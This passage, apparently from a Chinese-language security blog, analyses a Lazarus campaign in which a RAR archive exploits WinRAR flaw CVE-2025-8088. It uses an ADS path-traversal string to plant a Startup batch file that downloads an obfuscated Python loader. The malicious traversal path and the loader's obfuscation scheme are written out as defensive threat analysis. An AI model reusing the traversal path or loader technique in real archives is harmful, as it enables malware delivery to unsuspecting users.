135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">1. 载荷投递分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">Lazarus组织通过投递名为“Pharos.rar”的压缩包文件针对受害者展开攻击，基本信息如下:</span></span></p><table style="width:573px;"><tbody><tr><td data-colwidth="116"><p><span leaf="">MD5</span></p></td><td data-colwidth="457"><p><span leaf="">faa9dec02bad43b1af68a4194dea8762</span></p></td></tr><tr><td data-colwidth="116"><p><span leaf="">文件名称</span></p></td><td data-colwidth="457"><p><span leaf="">Pharos.rar</span></p></td></tr><tr><td data-colwidth="116"><p><span leaf="">文件大小</span></p></td><td data-colwidth="457"><p><span leaf="">115 KB (118,528 字节)</span></p></td></tr></tbody></table><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">“Pharos.rar”是一个携带“CVE-2025-8088”漏洞，伪装成“Pharos-Automation-Bot”项目的压缩包文件。“CVE-2025-8088”是WinRAR程序存在的路径穿越漏洞，其漏洞成因在于WinRAR工具在处理ADS数据流时对于ADS流的路径没有进行充分校验导致攻击者可以构造恶意的ADS流路径(ADS通过路径中的“：”符号区分本体数据和流数据)，从而将指定文件写入攻击者指定的目录下从而实现任意代码执行。</span></span></p></div></div><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">如下是分别使用360压缩程序和</span><span leaf="">WinRAR</span><span leaf="">打开“Pharos.rar”文件展示图，360压缩将其显示为一个文件目录，而</span><span leaf="">WinRAR</span><span leaf="">程序并没有显示，这样就迷惑了受害者，以至受害者认为没有其他文件。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023971" class="rich_pages wxw-img" data-ratio="0.46705202312138727" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=3ec00281&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK9qn0ia6Uds2iaBzvrfvnJaCeOF30Cv3pbLIMZP5eGEL8wgq0CmjkPXUA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">如图可见，“Pharos.rar”压缩包有多个RarBlock区块，其中0号区块是主区块，1到22号区块以File区块和NTFS区块两两交替分布，表示每个文件实体后紧跟一个NTFS Alternate Data Stream（ADS）数据。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023972" class="rich_pages wxw-img" data-ratio="0.4161849710982659" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=13265150&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKGbiaVjh24Fad4BHH70fjzEWgR1nYs7gp5H9EVftSjjW3Ffaj2Cx8YUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">每个NTFS区块中，有多个属性结构体，其中Name为“STM”，标识该数据流属性，以及DataArea字段存储ADS文件的实际路径。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023973" class="rich_pages wxw-img" data-ratio="0.5294797687861271" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=5860f5a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKJfwpdiaNJA2GgEhHDOOsQNHEICXGia2zQpHasMERceyQaVYPoYopxx7A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">通过分析，</span><span leaf="">WinRAR</span><span leaf="">会逐个解析RarBlock结构体，当解析到携带ADS流的RarBlock结构体时，会判断Name字段是否是“STM”，如果是执行“cve_2025_8088_start”，并将RAR文件中的压缩文件本体路径传入。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023974" class="rich_pages wxw-img" data-ratio="0.2786127167630058" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=9557b0d1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKf6MuOtd2GNiagiazOw3o5DD9YI6v0gRrma8pIqF7FkteCRGtib33SPeaA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">cve_2025_8088_start函数逻辑是这样的，首先解析RarBlock结构体中的RecordData数据（这部分数据在RAR文件中表示的是ADS路径）。然后判断ADS路径是否以“：”开头，</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023975" class="rich_pages wxw-img" data-ratio="0.17572254335260115" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b8aacebf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKOKZj5cou5zLjndB4NR3oo3L9hCicicuDqj9tSnN9rX6WSSWw0uJVJhaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">然后将传入的文件本体路径和获取到的ADS路径进行拼接。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023976" class="rich_pages wxw-img" data-ratio="0.2809248554913295" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=81125728&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKamV1SwS34nAibg2kfaUOOQoRK6kdupG258F9P5bzoxE6hvjbaVKJFAw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最后，根据拼接好的路径传入指定函数中，继而通过CreateFileW函数创建携带ADS流的文件。</span></span></p></div></div><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023977" class="rich_pages wxw-img" data-ratio="0.40809248554913297" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=be48a4ba&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK5NJIO2XFYE3OtY48iaLueskLM9f4ulEJysaslpyOr1lfUA0gbdnuCDw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">但是，WinRAR7.12并没有对待创建的文件路径进行校验，导致异常的文件路径“[dir]\Pharos\contract_adress_1.txt:..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.bat”传入CreateFileW中，而合法的文件路径为“[dir]\Pharos\\contract_adress_1.txt:1.bat”，即ADS名称部分（冒号后）不能包含路径分隔符“\”。这点在WinRAR 7.13的补丁中已被修复，通过强制校验ADS路径格式，确保其符合规范，从而阻断利用异常路径实现任意文件写入的攻击手法。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023978" class="rich_pages wxw-img" data-ratio="0.4554913294797688" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b83f6379&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKk7OfnuGHv9Bb6PmIKicuiaaXtYTkKecceR90x8CPtkdqkOhAT0Bn2Peg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">一旦用户解压上述攻击者投递的恶意文档，就会触发目录穿越漏洞，将名为“1.bat”的恶意载荷释放到“C:\Users\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”目录，以展开后续攻击。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023979" class="rich_pages wxw-img" data-ratio="0.30289017341040464" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=8f392ac6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKBPSeaQEsRyu3Rgv9YA15CcEVaCcbaIzK4QxNFWrhibkzWbRFBzBBz1w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">释放到自启动目录下的1.bat脚本是一个伪装成“Windows Defender 更新提示”并下载、执行恶意载荷（stub.pyw）的恶意脚本，内容如下所示。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023980" class="rich_pages wxw-img" data-ratio="0.5202312138728323" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=4b462053&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKYnATTccaCqSOOdC0icR7fibribcuU2DsEUyiaX5AoV4gauIwR6Rn1NPxhQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">其执行时首先调用powershell弹出Windows Defender 更新警告框，诱导用户关闭杀软。接着从从Dropbox下载一个Python脚本（stub.pyw）到%USERPROFILE%\Downloads目录并执行。1.bat执行警告框如下图所示：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023981" class="rich_pages wxw-img" data-ratio="0.4024024024024024" data-type="png" data-w="666" src="https://wechat2rss.xlab.app/img-proxy/?k=97a99fb7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKhwOHhu4se205Vl3S3vs96YefFqcQXibN6HaD8N0PCMhCPQAphKKSOaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><strong style="color: rgb(190, 25, 31);font-size: 17px;letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="">2. 攻击组件分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">下载的stub.pyw是一个用多层嵌套字符串反序+base64解码+zlib解压缩的动态执行器（loader）。它从混淆的字节串中还原出压缩的Python代码，然后使用exec()执行。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023982" class="rich_pages wxw-img" data-ratio="0.4508670520231214" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=2e56d112&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqK15fdb3qSq0sDYvZMBYicvpN7Xogdm9e0uibNOKGDlLibWBrmpjiaVbCiaow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">经过63轮反序+base64解码+zlib解压缩后可得到第一次明文。如下图所示：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023983" class="rich_pages wxw-img" data-ratio="0.6445714285714286" data-type="png" data-w="875" src="https://wechat2rss.xlab.app/img-proxy/?k=e7cefa44&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKmN43vKQntJ0mSgW6OfXuET6Ua1ceXQzG5E7fwM9galYxibvEqK8CKvQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">但是得到的明文又分两部分，第一部分继续是使用相同方式混淆的代码，第二部分明文是基于的Python木马。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">针对第一部分混淆的代码继续经过63轮解压缩得到明文，其主要功能是判断当前机器是否有Python环境，没有则安装以便后续代码执行，然后在启动目录下写入Tsunami Injector脚本。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100023984" class="rich_pages wxw-img" data-ratio="0.8254545454545454" data-type="png" data-w="825" src="https://wechat2rss.xlab.app/img-proxy/?k=90304e28&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4PpLyYgtOYV1jicQpN9ocABqKbpweOKa0Pr4vCZQRKj09QrfIX1AlTFRKScP8zIFp34mL7064L1uYZA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft 